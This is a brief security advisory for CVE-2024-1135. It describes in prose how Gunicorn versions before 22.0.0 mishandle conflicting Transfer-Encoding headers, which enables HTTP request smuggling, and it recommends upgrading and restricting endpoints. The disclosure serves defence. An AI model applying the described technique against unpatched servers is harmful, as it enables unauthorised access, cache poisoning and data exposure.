CVE-2024-1135

Name of the Vulnerable Software and Affected Versions Gunicorn versions prior to 22.0.0

Description Gunicorn fails to properly validate Transfer-Encoding headers, leading to HTTP Request Smuggling (HRS) vulnerabilities. By crafting requests with conflicting Transfer-Encoding headers, attackers can bypass security restrictions and access restricted endpoints. This issue is due to Gunicorn's handling of Transfer-Encoding headers, where it incorrectly processes requests with multiple, conflicting Transfer-Encoding headers, treating them as chunked regardless of the final encoding specified. This vulnerability allows for a range of attacks including cache poisoning, session manipulation, and data exposure.

Recommendations For versions prior to 22.0.0, update to version 22.0.0 or later to resolve the issue. As a temporary workaround, consider blocking access to restricted endpoints via a firewall or other mechanism if updating is not possible. Restrict access to endpoints that may be vulnerable to HTTP Request Smuggling attacks until the issue is resolved. Avoid using the Transfer-Encoding header in requests to Gunicorn servers until the issue is resolved.